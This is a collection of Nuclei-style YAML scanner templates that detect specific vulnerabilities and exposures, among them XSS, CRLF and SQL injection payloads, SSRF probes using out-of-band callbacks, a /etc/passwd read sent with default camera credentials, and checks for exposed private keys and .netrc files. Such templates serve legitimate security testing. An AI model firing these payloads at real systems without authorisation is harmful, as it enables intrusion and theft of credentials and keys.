All rights reserved" 24 | part: body 25 | condition: and 26 | 27 | - type: status 28 | status: 29 | - 200 30 | -------------------------------------------------------------------------------- /darkstat-detect.yaml: -------------------------------------------------------------------------------- 1 | id: darkstat-detect 2 | 3 | info: 4 | name: Detect Darkstat Reports 5 | author: geeknik 6 | description: Darkstat captures network traffic, calculates statistics about usage, and serves reports over HTTP 7 | reference: https://unix4lyfe.org/darkstat/ 8 | severity: high 9 | tags: darkstat,logs,exposure 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | - "{{BaseURL}}/darkstat/" 16 | # FYI, the default port for darkstat is 666 17 | matchers-condition: and 18 | matchers: 19 | - type: regex 20 | part: header 21 | regex: 22 | - "[Ss]erver: darkstat.*" 23 | - type: word 24 | part: body 25 | words: 26 | - "darkstat" 27 | - "Graphs" 28 | - "Measuring for" 29 | - "hosts</a>" 30 | condition: and 31 | 32 | extractors: 33 | - type: kval 34 | part: header 35 | kval: 36 | - server 37 | -------------------------------------------------------------------------------- /netgear-router-disclosure.yaml: -------------------------------------------------------------------------------- 1 | id: netgear-router-disclosure 2 | 3 | info: 4 | name: Netgear Router S/N Disclosure 5 | description: Multiple Netgear router models disclose their serial number which can be used to obtain the admin password if password recovery is enabled. 
6 | reference: 7 | - https://www.exploit-db.com/exploits/47117 8 | - https://www.exploit-db.com/exploits/45741 9 | author: geeknik 10 | severity: critical 11 | tags: netgear,disclosure,iot 12 | 13 | requests: 14 | - method: GET 15 | path: 16 | - "{{BaseURL}}/rootDesc.xml" 17 | # Commonly found on Port 56688 18 | 19 | matchers-condition: and 20 | matchers: 21 | - type: status 22 | status: 23 | - 200 24 | - type: word 25 | words: 26 | - "<serialNumber>" 27 | - "</serialNumber>" 28 | condition: and 29 | extractors: 30 | - type: regex 31 | name: serial_number 32 | regex: 33 | - ">(.*)<" 34 | -------------------------------------------------------------------------------- /CVE-2020-13379.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2020-13379 2 | 3 | info: 4 | name: Grafana SSRF CVE-2020-13379 5 | description: The avatar feature in Grafana 3.0.1 through 7.0.1 has an SSRF Incorrect Access Control issue. This vulnerability allows any unauthenticated user/client to make Grafana send HTTP requests to any URL and return its result to the user/client. This can be used to gain information about the network that Grafana is running on. Furthermore, passing invalid URL objects could be used for DOS'ing Grafana via SegFault. 
6 | reference: https://rhynorater.github.io/CVE-2020-13379-Write-Up 7 | author: geeknik 8 | severity: high 9 | tags: cve,cve2020,grafana,ssrf 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/avatar/test%3fd%3dredirect.rhynorater.com%25253f%253b%252fbp.blogspot.com%252f{{interactsh-url}}" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | part: interactsh-protocol 20 | words: 21 | - "http" 22 | -------------------------------------------------------------------------------- /CVE-2021-27132.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2021-27132 2 | 3 | info: 4 | name: CRLF Injection - Sercomm VD625 5 | author: geeknik 6 | severity: medium 7 | description: Sercomm AGCOMBO VD625 Smart Modems with firmware version AGSOT_2.1.0 are vulnerable to CRLF Injection via the Content-Disposition header - https://cybertuz.com/blog/post/crlf-injection-CVE-2021-27132 8 | tags: cve,cve2021,crlf 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20example.com%0d%0aX-XSS-Protection:0" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: status 18 | status: 19 | - 404 20 | part: header 21 | 22 | - type: word 23 | words: 24 | - "Content-Disposition: attachment;filename=test.txt" 25 | - "Set-Cookie:CRLFInjection=Test" 26 | - "Location: example.com" 27 | - "X-XSS-Protection:0" 28 | part: header 29 | condition: and 30 | -------------------------------------------------------------------------------- /CVE-2021-31250.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2021-31250 2 | 3 | info: 4 | name: CHIYU IoT XSS 5 | author: geeknik 6 | description: Several versions and models of CHIYU IoT devices are vulnerable to multiple Cross-Site Scripting flaws. 
7 | reference: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31250 8 | severity: medium 9 | tags: cve,cve2021,chiyu,xss,iot 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28{{randstr}}%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY" 15 | headers: 16 | Authorization: "Basic OmFkbWlu" 17 | 18 | redirects: true 19 | matchers-condition: and 20 | matchers: 21 | - type: word 22 | part: header 23 | words: 24 | - "text/html" 25 | - type: word 26 | part: body 27 | words: 28 | - "\"><script>alert({{randstr}})</script>" 29 | -------------------------------------------------------------------------------- /development-logs.yaml: -------------------------------------------------------------------------------- 1 | id: development-logs 2 | 3 | info: 4 | name: Discover development log files 5 | author: geeknik 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/log/development.log" 12 | - "{{BaseURL}}/logs/development.log" 13 | - "{{BaseURL}}/development.log" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - "Connecting to database specified by database.yml" 20 | - "Started GET" 21 | condition: or 22 | - type: word 23 | words: 24 | - "DEPRECATION WARNING" 25 | - "CREATE TABLE" 26 | condition: or 27 | - type: word 28 | part: header 29 | words: 30 | - "text/html" 31 | negative: true 32 | - type: status 33 | status: 34 | - 200 35 | extractors: 36 | - type: regex 37 | name: last_modified 38 | part: header 39 | regex: 40 | - 'Last-Modified:.*' 41 | -------------------------------------------------------------------------------- /sony-bravia-disclosure.yaml: -------------------------------------------------------------------------------- 1 | id: sony-bravia-disclosure 2 | 3 | info: 4 | name: Sony BRAVIA Digital Signage 
1.7.8 System API Information Disclosure 5 | description: The application is vulnerable to a sensitive information disclosure vulnerability. An unauthenticated attacker can visit several API endpoints and disclose information about the device. 6 | reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5610.php 7 | author: geeknik 8 | severity: medium 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/api/system" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - '"contentsServer":' 20 | - '"networkInterfaces":' 21 | - '"serverTime":' 22 | - '"hostIp":' 23 | condition: and 24 | - type: word 25 | part: header 26 | words: 27 | - "text/plain" 28 | - "application/json" 29 | condition: or 30 | - type: status 31 | status: 32 | - 200 33 | -------------------------------------------------------------------------------- /beward-ipcamera-disclosure.yaml: -------------------------------------------------------------------------------- 1 | id: beward-ipcamera-disclosure 2 | 3 | info: 4 | name: BEWARD N100 H.264 VGA IP Camera M2.1.6 Arbitrary File Disclosure 5 | description: The N100 compact color IP camera suffers from an authenticated file disclosure vulnerability. Input passed via the READ.filePath parameter in the fileread script is not properly verified before being used to read files. This can be exploited to disclose the contents of arbitrary files via absolute path or via the SendCGICMD API. 
6 | reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5511.php 7 | author: geeknik 8 | severity: high 9 | tags: beward,iot,camera,disclosure 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/cgi-bin/operator/fileread?READ.filePath=/etc/passwd" 15 | headers: 16 | Authorization: "Basic YWRtaW46YWRtaW4=" 17 | 18 | matchers-condition: and 19 | matchers: 20 | - type: regex 21 | regex: 22 | - 'root:[x*]:0:0:' 23 | condition: or 24 | - type: status 25 | status: 26 | - 200 27 | -------------------------------------------------------------------------------- /CVE-2015-6477.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2015-6477 2 | 3 | info: 4 | name: Nordex NC2 'username' Parameter XSS 5 | description: An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
6 | reference: 7 | - https://seclists.org/fulldisclosure/2015/Dec/117 8 | - https://ics-cert.us-cert.gov/advisories/ICSA-15-286-01 9 | author: geeknik 10 | severity: medium 11 | tags: cve,cve2015,xss,iot,nordex,nc2 12 | 13 | requests: 14 | - method: POST 15 | path: 16 | - "{{BaseURL}}/login" 17 | body: 'connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&pw=nordex&language=en' 18 | 19 | matchers-condition: and 20 | matchers: 21 | - type: word 22 | part: header 23 | words: 24 | - "text/html" 25 | - type: word 26 | part: body 27 | words: 28 | - "</script><script>alert('xss')</script>" 29 | -------------------------------------------------------------------------------- /CVE-2021-3377.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2021-3377 2 | 3 | info: 4 | name: ansi_up xss 5 | description: The npm package ansi_up converts ANSI escape codes into HTML. In ansi_up v4, ANSI escape codes can be used to create HTML hyperlinks. Due to insufficient URL sanitization, this feature is affected by a cross-site scripting (XSS) vulnerability. This issue is fixed in v5.0.0. 
6 | reference: https://doyensec.com/resources/Doyensec_Advisory_ansi_up4_XSS.pdf 7 | author: geeknik 8 | severity: medium 9 | 10 | requests: 11 | - raw: 12 | - |+ 13 | GET /\u001B]8;;https://example.com"/onmouseover="alert(1)\u0007example\u001B]8;;\u0007 HTTP/1.1 14 | Host: {{Hostname}} 15 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 16 | Connection: close 17 | 18 | unsafe: true 19 | redirects: true 20 | matchers-condition: and 21 | matchers: 22 | - type: word 23 | part: header 24 | words: 25 | - "text/html" 26 | - type: word 27 | words: 28 | - "com\"/onmouseover=\"alert(1)\">" 29 | -------------------------------------------------------------------------------- /netrc.yaml: -------------------------------------------------------------------------------- 1 | id: netrc 2 | 3 | info: 4 | name: netrc config file 5 | author: geeknik 6 | description: The .netrc file contains login and initialization information used by the auto-login process. 7 | reference: https://www.gnu.org/software/inetutils/manual/html_node/The-_002enetrc-file.html 8 | severity: high 9 | tags: netrc,config,exposure 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/.netrc" 15 | - "{{BaseURL}}/_netrc" 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: status 20 | status: 21 | - 200 22 | - type: regex 23 | regex: 24 | - "machine [0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?(?:\\.[0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?)*\\.?" 25 | - type: word 26 | words: 27 | - "login " 28 | - "password " 29 | condition: and 30 | 31 | extractors: 32 | - type: regex 33 | part: body 34 | regex: 35 | - "machine [0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?(?:\\.[0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?)*\\.?" 
36 | -------------------------------------------------------------------------------- /CVE-2021-31249.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2021-31249 2 | 3 | info: 4 | name: CHIYU TCP/IP Converter devices - CRLF injection 5 | author: geeknik 6 | description: A CRLF injection vulnerability was found on BF-430, BF-431, and BF-450M TCP/IP Converter devices from CHIYU Technology Inc due to a lack of validation on the parameter 'redirect' available on multiple CGI components. 7 | reference: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31249 8 | severity: medium 9 | tags: cve,cve2021,chiyu,crlf,iot 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/man.cgi?redirect=setting.htm%0d%0a%0d%0a<script>alert(document.domain)</script>&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: status 19 | status: 20 | - 302 21 | - type: word 22 | part: header 23 | words: 24 | - "Location: setting.htm" 25 | - "<script>alert(document.domain)</script>" 26 | condition: and 27 | -------------------------------------------------------------------------------- /public-documents.yaml: -------------------------------------------------------------------------------- 1 | id: public-documents 2 | 3 | info: 4 | name: Alerts on pages that contain links to Excel, Word or CSV documents 5 | author: geeknik 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}" 12 | 13 | matchers-condition: and 14 | matchers: 15 | - type: word 16 | part: header 17 | words: 18 | - "text/html" 19 | - type: regex 20 | regex: 21 | - '\b([a-zA-Z0-9_\\.\-\(\):])+\.(xls[x]?)\b' 22 | - '\b([a-zA-Z0-9_\\.\-\(\):])+\.(doc[x]?)\b' 23 | - '\b([a-zA-Z0-9_\\.\-\(\):])+\.(csv)\b' 24 | condition: or 25 | 26 | extractors: 27 | - type: regex 28 
| part: body 29 | name: public_xls 30 | regex: 31 | - '\b([a-zA-Z0-9_\\.\-\(\):])+\.(xls[x]?)\b' 32 | - type: regex 33 | part: body 34 | name: public_doc 35 | regex: 36 | - '\b([a-zA-Z0-9_\\.\-\(\):])+\.(doc[x]?)\b' 37 | - type: regex 38 | part: body 39 | name: public_csv 40 | regex: 41 | - '\b([a-zA-Z0-9_\\.\-\(\):])+\.(csv)\b' 42 | -------------------------------------------------------------------------------- /CVE-2020-9402.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2020-9402 2 | 3 | info: 4 | name: Django SQL Injection 5 | description: Django 1.11 before 1.11.29, 2.2 before 2.2.11, and 3.0 before 3.0.4 allows SQL Injection if untrusted data is used as a tolerance parameter in GIS functions and aggregates on Oracle. By passing a suitably crafted tolerance to GIS functions and aggregates on Oracle, it was possible to break escaping and inject malicious SQL. 6 | reference: | 7 | - https://github.com/vulhub/vulhub/tree/master/django/CVE-2020-9402 8 | - https://docs.djangoproject.com/en/3.0/releases/security/ 9 | - https://nvd.nist.gov/vuln/detail/CVE-2020-9402 10 | author: geeknik 11 | severity: high 12 | tags: cve,cve2020,django,sqli 13 | 14 | requests: 15 | - method: GET 16 | path: 17 | - "{{BaseURL}}/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1" 18 | 19 | matchers: 20 | - type: word 21 | words: 22 | - "DatabaseError at" 23 | - "ORA-29257:" 24 | - "ORA-06512:" 25 | - "Request Method:" 26 | condition: and 27 | -------------------------------------------------------------------------------- /routes-ini.yaml: -------------------------------------------------------------------------------- 1 | id: routes-ini 2 | 3 | info: 4 | name: Discover routes.ini files 5 | author: geeknik 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/admin/configs/routes.ini" 12 | - 
"{{BaseURL}}/routes.ini" 13 | - "{{BaseURL}}/aplicacao/routes/configs/routes.ini" 14 | - "{{BaseURL}}/routes/configs/routes.ini" 15 | - "{{BaseURL}}/cloudexp/routes/configs/routes.ini" 16 | - "{{BaseURL}}/cms/routes/configs/routes.ini" 17 | - "{{BaseURL}}/moto/routes/configs/routes.ini" 18 | - "{{BaseURL}}/Partners/routes/configs/routes.ini" 19 | - "{{BaseURL}}/radio/routes/configs/routes.ini" 20 | - "{{BaseURL}}/seminovos/routes/configs/routes.ini" 21 | - "{{BaseURL}}/shop/routes/configs/routes.ini" 22 | - "{{BaseURL}}/site_cg/routes/configs/routes.ini" 23 | - "{{BaseURL}}/slr/routes/configs/routes.ini" 24 | 25 | matchers-condition: and 26 | matchers: 27 | - type: word 28 | words: 29 | - "routes.front" 30 | - "routes.admin" 31 | condition: and 32 | 33 | - type: status 34 | status: 35 | - 200 36 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2025 Brian Carpenter, Deep Fork Cyber, geeknik 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /squid-analysis-report-generator.yaml: -------------------------------------------------------------------------------- 1 | id: squid-analysis-report-generator 2 | 3 | info: 4 | name: Squid Analysis Report Generator 5 | author: geeknik 6 | description: SARG is an open source tool that allows you to analyse the squid log files and generates beautiful reports in HTML format with information about users, IP addresses, top accessed sites, total bandwidth usage, elapsed time, downloads, access denied websites, daily reports, weekly reports and monthly reports. 7 | reference: https://sourceforge.net/projects/sarg/ 8 | severity: high 9 | tags: sarg,exposure,logs 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | part: body 20 | words: 21 | - "Squid User Access Report" 22 | - "Squid User's Access Report" 23 | condition: or 24 | - type: word 25 | part: body 26 | words: 27 | - "<td>Daily reports" 28 | - "FILE/PERIOD" 29 | condition: or 30 | 31 | extractors: 32 | - type: regex 33 | part: body 34 | regex: 35 | - sarg-[0-99].[0-99].[0-99] 36 | -------------------------------------------------------------------------------- /CVE-2018-1000600.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-1000600 2 | 3 | info: 4 | name: CSRF and missing permission checks in Jenkins GitHub Plugin 5 | description: An exposure of sensitive information vulnerability exists in Jenkins GitHub Plugin 1.29.1 and earlier in GitHubTokenCredentialsCreator.java that allows attackers to connect to an 
attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins. 6 | reference: 7 | - https://www.jenkins.io/security/advisory/2018-06-25/#SECURITY-915 8 | - https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/ 9 | author: geeknik 10 | severity: medium 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - "{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://example.com" 16 | 17 | redirects: true 18 | matchers-condition: and 19 | matchers: 20 | - type: word 21 | words: 22 | - "<p>This domain is for use in illustrative examples in documents." 23 | part: body 24 | - type: status 25 | status: 26 | - 200 27 | -------------------------------------------------------------------------------- /rpcbind-portmapper.yaml: -------------------------------------------------------------------------------- 1 | id: rpcbind-portmapper 2 | 3 | info: 4 | name: Detects RPCBind Portmapper Services 5 | reference: https://book.hacktricks.xyz/pentesting/pentesting-rpcbind 6 | author: geeknik 7 | severity: info 8 | tags: network,rpcbind,portmap 9 | 10 | network: 11 | - inputs: 12 | - data: 8000002836ed646d0000000000000002000186a0000000040000000400000000000000000000000000000000 13 | type: hex 14 | 15 | host: 16 | - "{{Hostname}}:111" 17 | 18 | matchers: 19 | - type: word 20 | words: 21 | - "/run/rpcbind.sock" 22 | - type: word 23 | name: RPC_Users 24 | words: 25 | - "rusersd" 26 | - "udp" 27 | condition: and 28 | - type: word 29 | name: NIS 30 | words: 31 | - "ypbind" 32 | - "superuser" 33 | condition: and 34 | - type: word 35 | name: NFS 36 | words: 37 | - "nfs" 38 | - "tcp" 39 | - "udp" 40 | condition: and 41 | - type: word 42 | name: Portmap 43 | words: 44 | - "udp" 45 | - "tcp" 46 | - "portmapper" 47 | condition: and 48 | 
-------------------------------------------------------------------------------- /CVE-2021-24291.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2021-24291 2 | 3 | info: 4 | name: Photo Gallery < 1.5.69 - Multiple Reflected Cross-Site Scripting (XSS) 5 | author: geeknik 6 | description: The plugin was vulnerable to Reflected Cross-Site Scripting (XSS) issues via the gallery_id, tag, album_id and theme_id GET parameters passed to the bwg_frontend_data AJAX action (available to both unauthenticated and authenticated users). 7 | reference: https://wpscan.com/vulnerability/cfb982b2-8b6d-4345-b3ab-3d2b130b873a 8 | severity: medium 9 | tags: cve,cve2021,10web,xss 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&tag=%22%20onmouseover=alert(1)%3E" 15 | - "{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&theme_id=%22%20onmouseover=alert(1)%3E" 16 | - "{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&gallery_id=1%22%20onmouseover=alert(1)%3E" 17 | 18 | matchers-condition: and 19 | matchers: 20 | - type: status 21 | status: 22 | - 200 23 | - type: word 24 | part: header 25 | words: 26 | - "text/html" 27 | - type: word 28 | words: 29 | - "\" onmouseover=alert(1)>" 30 | -------------------------------------------------------------------------------- /CVE-2021-33221.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2021-33221 2 | 3 | info: 4 | name: CommScope Ruckus IoT Controller Unauthenticated Service Details 5 | author: geeknik 6 | description: A 'service details' API endpoint discloses system and configuration information to an attacker without requiring authentication. This information includes DNS and NTP servers that the device uses for time and host resolution. It also includes the internal hostname and IoT Controller version. 
A fully configured device in production may leak other, more sensitive information (API keys and tokens). 7 | reference: https://www.commscope.com/globalassets/digizuite/917216-faq-security-advisory-id-20210525-v1-0.pdf 8 | severity: medium 9 | tags: cve,cve2021,commscope,ruckus,debug 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/service/v1/service-details" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | part: header 20 | words: 21 | - "application/json" 22 | - type: word 23 | words: 24 | - "message" 25 | - "ok" 26 | - "data" 27 | - "dns" 28 | - "gateway" 29 | condition: and 30 | - type: status 31 | status: 32 | - 200 33 | -------------------------------------------------------------------------------- /server-private-keys.yaml: -------------------------------------------------------------------------------- 1 | id: server-private-keys 2 | 3 | info: 4 | name: Detect Private SSH and TLS Keys 5 | author: geeknik 6 | severity: high 7 | tags: config,exposure 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/localhost.key" 13 | - "{{BaseURL}}/host.key" 14 | - "{{BaseURL}}/www.key" 15 | - "{{BaseURL}}/private-key" 16 | - "{{BaseURL}}/privatekey.key" 17 | - "{{BaseURL}}/server.key" 18 | - "{{BaseURL}}/my.key" 19 | - "{{BaseURL}}/key.pem" 20 | - "{{BaseURL}}/ssl/localhost.key" 21 | - "{{BaseURL}}/ssl/{{Hostname}}.key" 22 | - "{{BaseURL}}/id_rsa" 23 | - "{{BaseURL}}/id_dsa" 24 | - "{{BaseURL}}/.ssh/id_rsa" 25 | - "{{BaseURL}}/.ssh/id_dsa" 26 | - "{{BaseURL}}/{{Hostname}}.key" 27 | - "{{BaseURL}}/{{Hostname}}.pem" 28 | 29 | matchers-condition: and 30 | matchers: 31 | - type: word 32 | words: 33 | - "BEGIN OPENSSH PRIVATE KEY" 34 | - "BEGIN PRIVATE KEY" 35 | - "BEGIN RSA PRIVATE KEY" 36 | - "BEGIN DSA PRIVATE KEY" 37 | - "BEGIN EC PRIVATE KEY" 38 | - "BEGIN PGP PRIVATE KEY BLOCK" 39 | condition: or 40 | 41 | - type: status 42 | status: 43 | - 200 44 | 
-------------------------------------------------------------------------------- /xmlrpc-pingback-ssrf.yaml: -------------------------------------------------------------------------------- 1 | id: xmlrpc-pingback-ssrf 2 | 3 | info: 4 | name: XMLRPC Pingback SSRF 5 | author: geeknik 6 | reference: https://hackerone.com/reports/406387 7 | severity: high 8 | 9 | requests: 10 | - raw: 11 | - | 12 | POST /xmlrpc/pingback HTTP/1.1 13 | Host: {{Hostname}} 14 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:62.0) Gecko/20100101 Firefox/62.0 15 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 16 | Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 17 | Accept-Encoding: gzip, deflate 18 | Cookie: COOKIE_SUPPORT=true; GUEST_LANGUAGE_ID=en_US; ANONYMOUS_USER_ID=2922001 19 | Connection: close 20 | Upgrade-Insecure-Requests: 1 21 | Content-Length: 305 22 | 23 | <?xml version="1.0" encoding="UTF-8"?> 24 | <methodCall> 25 | <methodName>pingback.ping</methodName> 26 | <params> 27 | <param> 28 | <value>http://{{interactsh-url}}</value> 29 | </param> 30 | <param> 31 | <value>https://{{Hostname}}/web/guest/home/</value> 32 | </param> 33 | </params> 34 | </methodCall> 35 | 36 | matchers-condition: and 37 | matchers: 38 | - type: word 39 | part: interactsh-protocol 40 | words: 41 | - "dns" 42 | - "http" 43 | -------------------------------------------------------------------------------- /ssrf-by-proxy.yaml: -------------------------------------------------------------------------------- 1 | id: ssrf-by-proxy 2 | 3 | info: 4 | name: SSRF via Proxy 5 | author: geeknik 6 | severity: info 7 | 8 | requests: 9 | - payloads: 10 | verb: 11 | - GET 12 | - HEAD 13 | - POST 14 | - PUT 15 | - DELETE 16 | - CONNECT 17 | - OPTIONS 18 | - TRACE 19 | - PATCH 20 | 21 | raw: 22 | - | 23 | {{verb}} http://{{interactsh-url}}/#{{verb}} HTTP/1.1 24 | Host: {{Hostname}} 25 | 26 | - | 27 | {{verb}} {{BaseURL}}/#{{verb}} HTTP/1.1 28 | Host: {{interactsh-url}} 29 | 30 | 
- | 31 | {{verb}} /http://{{interactsh-url}}/#{{verb}} HTTP/1.1 32 | Host: {{Hostname}} 33 | 34 | - | 35 | {{verb}} /{{BaseURL}}@{{interactsh-url}}/#{{verb}} HTTP/1.1 36 | Host: {{Hostname}} 37 | 38 | - | 39 | {{verb}} http%3A%2F%2F{{interactsh-url}}%2F%23{{verb}} HTTP/1.1 40 | Host: {{Hostname}} 41 | 42 | - | 43 | {{verb}} /http%3A%2F%2F{{interactsh-url}}%2F%23{{verb}} HTTP/1.1 44 | Host: {{Hostname}} 45 | 46 | - | 47 | {{verb}} /{{url_encode('{{BaseURL}}@{{interactsh-url}}/#{{verb}}')}} HTTP/1.1 48 | Host: {{Hostname}} 49 | 50 | matchers: 51 | - type: word 52 | part: interactsh_protocol 53 | words: 54 | - "dns" 55 | - "http" 56 | condition: or 57 | -------------------------------------------------------------------------------- /fuzz-oauth.yaml: -------------------------------------------------------------------------------- 1 | id: fuzz-oauth 2 | info: 3 | name: Fuzz OAuth 4 | reference: https://youst.in/posts/bypassing-2fa-using-openid-misconfiguration/ 5 | author: geeknik 6 | severity: info 7 | tags: fuzz,oauth 8 | requests: 9 | - payloads: 10 | boolean: 11 | - true 12 | - false 13 | acr: 14 | - face 15 | - fpt 16 | - geo 17 | - hwk 18 | - iris 19 | - kba 20 | - mca 21 | - mfa 22 | - otp 23 | - pin 24 | - pwd 25 | - rba 26 | - retina 27 | - sc 28 | - sms 29 | - swk 30 | - tel 31 | - user 32 | - wia 33 | attack: clusterbomb 34 | raw: 35 | - | 36 | GET /oauth/authorize?new-flow=§boolean§&client_id={{randstr}}&redirect_uri=https://{{interactsh-url}}%2Flogin&response_type=code&scope=openid&acr_values=§acr§+password&state={{randstr}} HTTP/1.1 37 | Host: {{Hostname}} 38 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 39 | Accept: */* 40 | Accept-Language: en 41 | Accept-Encoding: gzip 42 | Connection: close 43 | matchers-condition: or 44 | matchers: 45 | - type: word 46 | words: 47 | - "{{randstr}}" 48 | - type: word 49 | part: interactsh_protocol 50 | words: 51 | - "dns" 52 | - "http" 
53 | condition: or 54 | -------------------------------------------------------------------------------- /application-ini.yaml: -------------------------------------------------------------------------------- 1 | id: application-ini 2 | 3 | info: 4 | name: Discover Zend Framework application.ini files 5 | reference: https://github.com/feibeck/application.ini/blob/master/application.ini 6 | author: geeknik 7 | severity: high 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/admin/configs/application.ini" 13 | - "{{BaseURL}}/application.ini" 14 | - "{{BaseURL}}/aplicacao/application/configs/application.ini" 15 | - "{{BaseURL}}/application/configs/application.ini" 16 | - "{{BaseURL}}/cloudexp/application/configs/application.ini" 17 | - "{{BaseURL}}/cms/application/configs/application.ini" 18 | - "{{BaseURL}}/moto/application/configs/application.ini" 19 | - "{{BaseURL}}/Partners/application/configs/application.ini" 20 | - "{{BaseURL}}/radio/application/configs/application.ini" 21 | - "{{BaseURL}}/seminovos/application/configs/application.ini" 22 | - "{{BaseURL}}/shop/application/configs/application.ini" 23 | - "{{BaseURL}}/site_cg/application/configs/application.ini" 24 | - "{{BaseURL}}/slr/application/configs/application.ini" 25 | 26 | matchers-condition: and 27 | matchers: 28 | - type: word 29 | words: 30 | - "php" 31 | - "resources" 32 | condition: and 33 | - type: word 34 | part: body 35 | words: 36 | - "<HTML" 37 | - "<html" 38 | condition: or 39 | - type: word 40 | part: header 41 | words: 42 | - "text/html" 43 | negative: true 44 | - type: status 45 | status: 46 | - 200 47 | 